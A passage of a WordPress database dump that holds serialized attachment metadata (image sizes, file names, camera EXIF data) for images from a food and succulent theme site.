"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"recipe-web2-200x300.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"recipe-web2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:23:\"recipe-web2-420x300.jpg\";s:5:\"width\";i:420;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:23:\"recipe-web2-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:23:\"recipe-web2-420x550.jpg\";s:5:\"width\";i:420;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:23:\"recipe-web2-420x550.jpg\";s:5:\"width\";i:420;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:23:\"recipe-web2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:23:\"recipe-web2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"4\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:14:\"Canon EOS 200D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1540365787\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"50\";s:3:\"iso\";s:3:\"400\";s:13:\"shutter_speed\";s:4:\"0.01\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(85,1081,'_wp_attachment_image_alt','o'),(86,3951,'_wp_attachment_image_alt','a'),(87,3952,'_wp_attached_file','2018/03/sallad-recipe-new.jpg'),(88,3952,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:420;s:6:\"height\";i:630;s:4:\"file\";s:29:\"2018/03/sallad-recipe-new.jpg\";s:5:\"sizes\";a:10:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:29:\"sallad-recipe-new-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:29:\"sallad-recipe-new-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"sallad-recipe-new-200x300.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"sallad-recipe-new-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:29:\"sallad-recipe-new-420x300.jpg\";s:5:\"width\";i:420;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:29:\"sallad-recipe-new-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:29:\"sallad-recipe-new-420x550.jpg\";s:5:\"width\";i:420;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:29:\"sallad-recipe-new-420x550.jpg\";s:5:\"width\";i:420;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:29:\"sallad-recipe-new-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:29:\"sallad-recipe-new-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"3.5\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:14:\"Canon EOS 200D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1517452294\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"105\";s:3:\"iso\";s:3:\"200\";s:13:\"shutter_speed\";s:6:\"0.0125\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(89,3405,'_wp_attachment_image_alt',''),(90,1082,'_wp_attached_file','2018/01/h2-slider1-graphic8.png'),(91,1082,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:280;s:6:\"height\";i:585;s:4:\"file\";s:31:\"2018/01/h2-slider1-graphic8.png\";s:5:\"sizes\";a:10:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:31:\"h2-slider1-graphic8-280x300.png\";s:5:\"width\";i:280;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:31:\"h2-slider1-graphic8-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"h2-slider1-graphic8-144x300.png\";s:5:\"width\";i:144;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"h2-slider1-graphic8-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:31:\"h2-slider1-graphic8-280x300.png\";s:5:\"width\";i:280;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:31:\"h2-slider1-graphic8-280x240.png\";s:5:\"width\";i:280;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:31:\"h2-slider1-graphic8-280x550.png\";s:5:\"width\";i:280;s:6:\"height\";i:550;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:31:\"h2-slider1-graphic8-280x550.png\";s:5:\"width\";i:280;s:6:\"height\";i:550;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:31:\"h2-slider1-graphic8-280x300.png\";s:5:\"width\";i:280;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:31:\"h2-slider1-graphic8-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(92,3406,'_wp_attached_file','2018/02/h4-img-12.jpg'),(93,3406,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:1100;s:4:\"file\";s:21:\"2018/02/h4-img-12.jpg\";s:5:\"sizes\";a:17:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:21:\"h4-img-12-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:21:\"h4-img-12-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:21:\"h4-img-12-600x344.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:344;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"h4-img-12-300x172.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:172;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"h4-img-12-1024x587.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:587;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"h4-img-12-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"h4-img-12-768x440.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:440;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:21:\"h4-img-12-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:21:\"h4-img-12-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:22:\"h4-img-12-1536x880.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:880;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:21:\"h4-img-12-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:22:\"h4-img-12-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:22:\"h4-img-12-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:23:\"h4-img-12-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:21:\"h4-img-12-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:21:\"h4-img-12-600x344.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:344;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:21:\"h4-img-12-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(94,3952,'_wp_attachment_image_alt','a'),(95,3953,'_wp_attached_file','2018/03/drink-ornage-new-website.jpg'),(96,3953,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:420;s:6:\"height\";i:630;s:4:\"file\";s:36:\"2018/03/drink-ornage-new-website.jpg\";s:5:\"sizes\";a:10:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:36:\"drink-ornage-new-website-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:36:\"drink-ornage-new-website-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:36:\"drink-ornage-new-website-200x300.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:36:\"drink-ornage-new-website-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:36:\"drink-ornage-new-website-420x300.jpg\";s:5:\"width\";i:420;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:36:\"drink-ornage-new-website-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:36:\"drink-ornage-new-website-420x550.jpg\";s:5:\"width\";i:420;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:36:\"drink-ornage-new-website-420x550.jpg\";s:5:\"width\";i:420;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:36:\"drink-ornage-new-website-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:36:\"drink-ornage-new-website-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"1.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:20:\"Canon EOS 5D Mark II\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1480761825\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"50\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:6:\"0.0008\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(97,1082,'_wp_attachment_image_alt','o'),(98,2981,'_wp_attachment_image_alt','h'),(99,642,'_wp_attachment_image_alt','o'),(100,1083,'_wp_attached_file','2018/01/h2-slider1-graphic6.png'),(101,1083,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:441;s:6:\"height\";i:357;s:4:\"file\";s:31:\"2018/01/h2-slider1-graphic6.png\";s:5:\"sizes\";a:8:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:31:\"h2-slider1-graphic6-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:31:\"h2-slider1-graphic6-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"h2-slider1-graphic6-300x243.png\";s:5:\"width\";i:300;s:6:\"height\";i:243;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"h2-slider1-graphic6-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:31:\"h2-slider1-graphic6-441x300.png\";s:5:\"width\";i:441;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:31:\"h2-slider1-graphic6-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:31:\"h2-slider1-graphic6-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:31:\"h2-slider1-graphic6-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(102,3953,'_wp_attachment_image_alt','a'),(103,1435,'_wp_attachment_image_alt','q'),(104,2988,'_wp_attached_file','2018/02/pricing-packages-parallax-1.jpg'),(105,2988,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:565;s:4:\"file\";s:39:\"2018/02/pricing-packages-parallax-1.jpg\";s:5:\"sizes\";a:17:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:39:\"pricing-packages-parallax-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:39:\"pricing-packages-parallax-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:39:\"pricing-packages-parallax-1-600x177.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:177;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:38:\"pricing-packages-parallax-1-300x88.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:88;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:40:\"pricing-packages-parallax-1-1024x301.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:301;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:39:\"pricing-packages-parallax-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:39:\"pricing-packages-parallax-1-768x226.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:226;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:39:\"pricing-packages-parallax-1-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:39:\"pricing-packages-parallax-1-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:40:\"pricing-packages-parallax-1-1536x452.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:452;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:39:\"pricing-packages-parallax-1-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:40:\"pricing-packages-parallax-1-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:39:\"pricing-packages-parallax-1-550x565.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:565;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:40:\"pricing-packages-parallax-1-1100x565.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:565;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:39:\"pricing-packages-parallax-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:39:\"pricing-packages-parallax-1-600x177.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:177;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:39:\"pricing-packages-parallax-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(106,643,'_wp_attached_file','2018/01/h10-slide4-graphic1.jpg'),(107,643,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:1095;s:4:\"file\";s:31:\"2018/01/h10-slide4-graphic1.jpg\";s:5:\"sizes\";a:17:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:31:\"h10-slide4-graphic1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:31:\"h10-slide4-graphic1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:31:\"h10-slide4-graphic1-600x342.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:342;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"h10-slide4-graphic1-300x171.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:171;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:32:\"h10-slide4-graphic1-1024x584.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:584;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"h10-slide4-graphic1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:31:\"h10-slide4-graphic1-768x438.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:438;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:31:\"h10-slide4-graphic1-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:31:\"h10-slide4-graphic1-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:32:\"h10-slide4-graphic1-1536x876.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:876;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:31:\"h10-slide4-graphic1-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:32:\"h10-slide4-graphic1-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:32:\"h10-slide4-graphic1-550x1095.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1095;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:33:\"h10-slide4-graphic1-1100x1095.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1095;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:31:\"h10-slide4-graphic1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:31:\"h10-slide4-graphic1-600x342.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:342;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:31:\"h10-slide4-graphic1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(108,3969,'_wp_attached_file','2018/03/landing-home-8.jpg'),(109,3969,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:470;s:4:\"file\";s:26:\"2018/03/landing-home-8.jpg\";s:5:\"sizes\";a:13:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:26:\"landing-home-8-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:26:\"landing-home-8-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:26:\"landing-home-8-600x353.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:353;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"landing-home-8-300x176.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:176;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"landing-home-8-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"landing-home-8-768x451.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:451;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:26:\"landing-home-8-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:26:\"landing-home-8-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:26:\"landing-home-8-550x470.jpg\";s:5:\"width